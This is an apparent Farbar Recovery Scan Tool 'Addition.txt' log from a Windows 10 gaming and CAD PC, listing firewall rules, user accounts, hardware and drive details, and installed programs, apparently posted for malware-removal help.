FirewallRules: [UDP Query User{70EA34E7-D380-4AA7-B630-E44F9EBDBF55}C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Allow) C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [TCP Query User{D9BE0F07-713A-4C7D-BBF5-69E6D3AA456C}C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Allow) C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [{C932D19A-83C5-4E9A-8621-7FB1E16B9FE4}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{842EEF74-E01B-4251-B14F-AE52F479B695}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{4AAE633B-A344-46AA-A0FB-B65C5CA8EEC0}] => (Allow) LPort=35359
FirewallRules: [{E234A8A0-FC92-477F-8D96-BC8EA9736C02}] => (Allow) LPort=35359
FirewallRules: [UDP Query User{445AEBC2-7551-4859-BF7C-B7EFBA93C718}C:\program files (x86)\java\jre1.8.0_66\bin\java.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\java.exe
FirewallRules: [TCP Query User{D39FC987-5695-45D9-B471-72A6E8EDF82C}C:\program files (x86)\java\jre1.8.0_66\bin\java.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\java.exe
FirewallRules: [UDP Query User{1D4275C1-B96B-4321-BEDC-BDB9441F005F}D:\games\assetto corsa\acs_x86.exe] => (Allow) D:\games\assetto corsa\acs_x86.exe
FirewallRules: [TCP Query User{7D6632F2-6401-4B58-BD71-E308C0E2862C}D:\games\assetto corsa\acs_x86.exe] => (Allow) D:\games\assetto corsa\acs_x86.exe
FirewallRules: [{D6B0B055-BA21-42F9-AF82-8EB6B0671EDB}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{B13B5683-96DA-40C9-853F-83D8F1E8311E}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{6BC96264-0C0F-4DEE-AB7B-ED060088B268}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{55383924-F7BA-4E9A-93F9-3D4FBD194AF5}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{89C2649E-DA28-44E7-9C1C-710EB2B4F806}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{062BE7E7-2737-4786-8441-2C486848EA6A}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{EFE6DE3A-FFDF-4504-B2DF-F76E64C3F15A}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [{23FAB33E-4807-42AA-AFA6-C67BD22A5BB0}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [TCP Query User{6C19374D-7CAC-45A0-BE25-1EB2CFAC0480}D:\games\archicad 18\archicad.exe] => (Allow) D:\games\archicad 18\archicad.exe
FirewallRules: [UDP Query User{D9347118-9F09-415C-8677-2B4CA99BA2CE}D:\games\archicad 18\archicad.exe] => (Allow) D:\games\archicad 18\archicad.exe
FirewallRules: [TCP Query User{FAE0DFDF-A5DC-4765-A413-26A05ECF7B34}D:\games\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) D:\games\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [UDP Query User{FF2639AC-4628-4B1F-A2B9-25BDE7E932D5}D:\games\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) D:\games\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [{D73CD750-448A-4059-91CB-0D9901C5BD6B}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0F4A6118-DBD6-40C8-9569-8EF064AD8433}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [{B5279392-29B4-4ABE-AB30-85E6B994F9E9}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [TCP Query User{15CE73A5-271D-44E2-9066-F9FAD9DF43DD}C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe] => (Allow) C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe
FirewallRules: [UDP Query User{33F8D17D-D01D-4B70-B3A7-699CA0960C4F}C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe] => (Allow) C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe
FirewallRules: [{B3390D60-A055-4799-8928-7985E45D5073}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{119C46D2-D69F-4916-93D0-A492D3018FA3}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{D2B8970F-A339-455F-9BF2-551BE7A0AF7A}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{A84C5F67-63EF-40CF-8097-67C4F89AA0FE}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [TCP Query User{F8FC7D3F-4200-47CB-95A3-7DF412DD1D9B}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [UDP Query User{51EB5D95-5A2C-4F83-8850-D2946515AE58}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [{986167C5-E51F-4C37-BB35-97E62DEEBE01}] => (Allow) C:\Program Files (x86)\Mr DJ\Grand Theft Auto San Andreas\gta_sa.exe
FirewallRules: [{7C3F5ED7-3192-42E0-8A9E-77E040E4AD9F}] => (Allow) C:\Program Files (x86)\Mr DJ\Grand Theft Auto San Andreas\gta_sa.exe
FirewallRules: [{137FC7D5-30B5-4BBA-A710-8283E6609937}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{297E11F7-F88D-4C77-9C9E-55BD784FF74E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{9CFB2900-ED4C-4409-80AD-6D01C922FF13}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C767A13B-406C-4B07-B639-7EADA888EA8F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{0807AA42-C8B9-4D19-B4E5-DB8DB628D0C6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [TCP Query User{6834D14F-6071-4035-BD73-4DAAC949DDEF}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe] => (Allow) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe
FirewallRules: [UDP Query User{BAFB7D01-629D-446C-8553-FCC0E87B72C4}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe] => (Allow) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe
FirewallRules: [TCP Query User{1537CADF-6729-42B5-94CD-413F17548A1C}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe] => (Block) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe
FirewallRules: [UDP Query User{D939E31F-AE2F-4685-909F-B6DAAB94D96E}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe] => (Block) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe
FirewallRules: [TCP Query User{B44FE750-634B-4269-BB85-33B46F6758AD}E:\archicad 18\archicad.exe] => (Allow) E:\archicad 18\archicad.exe
FirewallRules: [UDP Query User{8664C386-999B-4BD2-9229-BEC8EC119384}E:\archicad 18\archicad.exe] => (Allow) E:\archicad 18\archicad.exe
FirewallRules: [TCP Query User{28811D0E-1839-44CC-917C-A453AA19F38F}E:\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) E:\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [UDP Query User{5072A21D-4055-4A7F-A331-95093DD4FC06}E:\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) E:\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [{33263AE2-FE54-40B1-A6D2-2E75CD0F8ACC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{F5F55D69-1237-4BF8-B325-8F0F8F18536C}C:\games\far cry primal\bin\fcprimal.exe] => (Allow) C:\games\far cry primal\bin\fcprimal.exe
FirewallRules: [UDP Query User{8EA80FD9-0C40-4D26-846A-114D98451260}C:\games\far cry primal\bin\fcprimal.exe] => (Allow) C:\games\far cry primal\bin\fcprimal.exe
FirewallRules: [{099E4F8C-7A71-4C04-8B64-B0AE458750F4}] => (Allow) C:\Program Files (x86)\GameforgeLive\gfl_client.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
==================== Restore Points =========================
Could not list restore points
Check "winmgmt" service or repair WMI.
==================== Faulty Device Manager Devices =============
Could not list Devices. Check "winmgmt" service or repair WMI.
==================== Event log errors: =========================
Could not start eventlog service, could not read events.
System error 123 has occurred.
The filename, directory name, or volume label syntax is incorrect.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz
Percentage of memory in use: 20%
Total physical RAM: 16339.81 MB
Available physical RAM: 12949.95 MB
Total Virtual: 16339.81 MB
Available Virtual: 13025.66 MB
==================== Drives ================================
Drive c: (Systém) (Fixed) (Total:194.76 GB) (Free:64.23 GB) NTFS
Drive d: (Data) (Fixed) (Total:736.2 GB) (Free:46.62 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or (Size: 931.5 GB) (Disk ID: 00000000)
Partition: GPT.
==================== End of Addition.txt ============================
Ran by Nekut (16-03-2017 16:48:03)
Running from C:\Users\Nekut\Desktop
Windows 10 Home Version 1607 (X64) (2016-09-27 17:22:44)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2417313614-488722605-2671369154-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2417313614-488722605-2671369154-503 - Limited - Disabled)
Guest (S-1-5-21-2417313614-488722605-2671369154-501 - Limited - Disabled)
Nekut (S-1-5-21-2417313614-488722605-2671369154-1001 - Administrator - Enabled) => C:\Users\Nekut
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
3DMark 11 (HKLM-x32\...\{f9e83b9c-ab7e-4005-8f32-4ea69703a5e4}) (Version: 1.0.132.0 - Futuremark)
3DMark 11 (Version: 1.0.132.0 - Futuremark) Hidden
4Story CZ 5.2.233 (HKLM-x32\...\4Story_CZ_is1) (Version: 5.2.233 - Gameforge4D GmbH)
A360 Desktop (HKLM\...\{7758802D-9486-4883-9927-CCAC366A3BA4}) (Version: 7.2.3.1800 - Autodesk)
ACAD Private (Version: 21.0.52.0 - Autodesk) Hidden
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Age of Chivalry (HKLM-x32\...\Steam App 17510) (Version: - Team Chivalry)
AIDA64 Extreme v5.00 (HKLM-x32\...\AIDA64 Extreme_is1) (Version: 5.00 - FinalWire Ltd.)
Amnesia. A Machine for Pigs, âĺđńč˙ 1.0 (HKLM-x32\...\Amnesia. A Machine for Pigs_is1) (Version: 1.0 - DangeSecond)
Ansel (Version: 376.19 - NVIDIA Corporation) Hidden
ASTRO Command Center (HKLM-x32\...\{78FAE775-D963-4031-97CC-75D96FF648EB}) (Version: 1.0.121 - Astro Gaming)
AutoCAD 2017 - English (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 Language Pack - English (Version: 21.0.52.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2017 (HKLM-x32\...\{8ED2ED41-4455-449D-993C-751C039089B9}) (Version: 15.11.3.0 - Autodesk)
Autodesk App Manager 2016-2017 (HKLM-x32\...\{C0954809-F5DC-426C-847E-8409DE14E4C0}) (Version: 2.2.0 - Autodesk)
Autodesk AutoCAD 2017 - English (HKLM\...\AutoCAD 2017 - English) (Version: 21.0.52.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.5 (HKLM-x32\...\{8600F844-9AA5-412E-B6F2-F9C6CBCFD268}) (Version: 1.2.5.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2017 Add-in 64 bit (HKLM\...\{276A67E0-71EB-4827-B5F7-2ACF02BC1A5B}) (Version: 4.37.6853 - Autodesk)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Material Library 2017 (HKLM-x32\...\{8FB9F735-D64C-4991-8D91-4CDDAB1ABDEE}) (Version: 15.11.3.0 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2017 (HKLM-x32\...\{3FBFBC43-9882-43FA-B979-2D53896747B3}) (Version: 15.11.3.0 - Autodesk)
Autodesk ReCap 360 (HKLM\...\Autodesk ReCap 360) (Version: 3.0.0.52 - Autodesk)
Autodesk ReCap 360 (Version: 3.0.0.52 - Autodesk) Hidden
AVG Zen (Version: 1.22.1 - AVG Technologies) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
BitTorrent (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\BitTorrent) (Version: 7.9.9.43296 - BitTorrent Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.24 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5790 - CDBurnerXP)
Cities Skylines Natural Disasters (HKLM-x32\...\Cities Skylines Natural Disasters_is1) (Version: - )
CodeMeter Runtime Kit v5.10a (HKLM\...\{CADFF08A-A157-474F-B6A8-8F26F81F7ABE}) (Version: 5.10.1224.501 - WIBU-SYSTEMS AG)
COMODO Internet Security Premium (HKLM\...\COMODO Internet Security) (Version: 10.0.0.6092 - COMODO Security Solutions Inc.)
COMODO Internet Security Premium (Version: 10.0.0.6092 - COMODO Security Solutions Inc.) Hidden
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.11 - Electronic Arts)
Euro Truck Simulator 2 (HKLM-x32\...\Euro Truck Simulator 2_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Farming Simulator 15 (HKLM-x32\...\Farming Simulator 15_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Fraps (HKLM-x32\...\Fraps) (Version: - )
Futuremark SystemInfo (HKLM-x32\...\{032DC00A-51D1-4D28-BFB7-1D0E85291E11}) (Version: 4.25.366 - Futuremark)
Gameforge Live 2.0.12 (HKLM-x32\...\{9C98989A-3A15-42DA-A3B9-D20331437D67}}_is1) (Version: 2.0.12 - Gameforge)
Goat Simulator Waste of Space (HKLM\...\Z29hdHNpbXVsYXRvcg_is1) (Version: 1 - )
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Grand Theft Auto San Andreas version 1.1.0.0 (HKLM-x32\...\Grand Theft Auto San Andreas_is1) (Version: 1.1.0.0 - Mr DJ)
Cheat Engine 6.5 (HKLM-x32\...\Cheat Engine 6.5_is1) (Version: - Cheat Engine)
Import souborů SketchUp 2016-2017 (HKLM-x32\...\{063925DB-9D8C-48E2-8F04-1B7038B6C783}) (Version: 2.2.0 - Autodesk)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.100.1519.7 - Intel Corporation)
Intel® Chipset Device Software (x32 Version: 10.0.27 - Intel(R) Corporation) Hidden
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: - )
IsoBuster 3.7 (HKLM-x32\...\IsoBuster_is1) (Version: 3.7 - Smart Projects)
Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
LOOT version 0.9.2 (HKLM-x32\...\{BF634210-A0D4-443F-A657-0DCE38040374}_is1) (Version: 0.9.2 - LOOT Team)
Malwarebytes verze 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50905.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{51adbf11-493f-431c-a862-967a0fae2944}) (Version: 12.0.21005.1 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\Minecraft) (Version: 1.8.8 - Minecraft)
Minimal ADB and Fastboot version 1.4.2 (HKLM-x32\...\{1901BAF7-7E78-4041-BC88-D0EE5DD1DFD9}_is1) (Version: 1.4.2 - Sam Rodberg)
Mount and Blade Warband - Viking Conquest (HKLM-x32\...\Mount and Blade Warband - Viking Conquest_is1) (Version: - )
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.62.1 - Black Tree Gaming)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.4.0.70 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.4.0.70 - NVIDIA Corporation)
NVIDIA Ovladač 3D Vision 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.53 - NVIDIA Corporation)
NVIDIA Ovladač HD audia 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.53 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.4.0.70 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.3.16.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
O&O Defrag Professional (HKLM\...\{50C961A1-889F-4A4E-9587-2772A45B6AAD}) (Version: 18.0.39 - O&O Software GmbH)
OpenOffice 4.1.1 (HKLM-x32\...\{C560D6E7-E40A-435D-8B71-62CBCF1701B2}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.103.32.0 - Overwolf Ltd.)
Ovládací panel NVIDIA 376.53 (Version: 376.53 - NVIDIA Corporation) Hidden
Path of Exile (HKLM-x32\...\{52797cef-39ff-4ea9-b055-4f9a336b412d}) (Version: 2.2.1.53465 - Grinding Gear Games)
Path of Exile (x32 Version: 2.2.1.53465 - Grinding Gear Games) Hidden
Počítačová aplikace Autodesk (HKLM-x32\...\Autodesk Desktop App) (Version: 6.2.0.174 - Autodesk)
Process Lasso (HKLM-x32\...\ProcessLasso) (Version: 8.9.8.6 - Bitsum)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Shadow.Warrior.2.Deluxe.Edition.[v.1.1.3.0]-ALI213 verze 1.1.3.0 (HKLM-x32\...\{ACB6FC5F-552D-4C67-A0F5-25555114841B}}_is1) (Version: 1.1.3.0 - Ali213.net)
Shelter 2 Mountains (HKLM-x32\...\Shelter 2 Mountains_is1) (Version: - )
SHIELD Streaming (Version: 7.1.0351 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.4.0.70 - NVIDIA Corporation) Hidden
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Simple Port Forwarding (HKLM-x32\...\Simple Port Forwarding) (Version: 3.8.5 - PcWinTech.com)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.26 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.26.101 - Skype Technologies S.A.)
Skyrim Script Extender (SKSE) (HKLM\...\Steam App 365720) (Version: - The SKSE Team)
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.6 - Sophos Limited)
Speciální aplikace Autodesk 2016-2017 (HKLM-x32\...\{27C15055-713B-4D0E-881F-19598A2DFD59}) (Version: 2.2.0 - Autodesk)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Sync withSIX (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Sync) (Version: 1.2.7 - SIX Networks GmbH)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Elder Scrolls V: Skyrim (HKLM\...\Steam App 72850) (Version: - Bethesda Game Studios)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.7 - Tunngle.net GmbH)
Uplay (HKLM-x32\...\Uplay) (Version: 10.0 - Ubisoft)
Vietcong (HKLM-x32\...\Vietcong) (Version: - )
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
War Thunder (HKLM-x32\...\Steam App 236390) (Version: - Gaijin Entertainment)
WibuKey Setup (WibuKey Remove) (HKLM\...\{00060000-0000-1004-8002-0000C06B5161}) (Version: Version 6.20 of 2013-Dec-18 (Build 1230) (Setup) - WIBU-SYSTEMS AG)
WinRAR 5.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)
Zemana AntiMalware (HKLM-x32\...\{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.72.0.176 - Zemana Ltd.)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
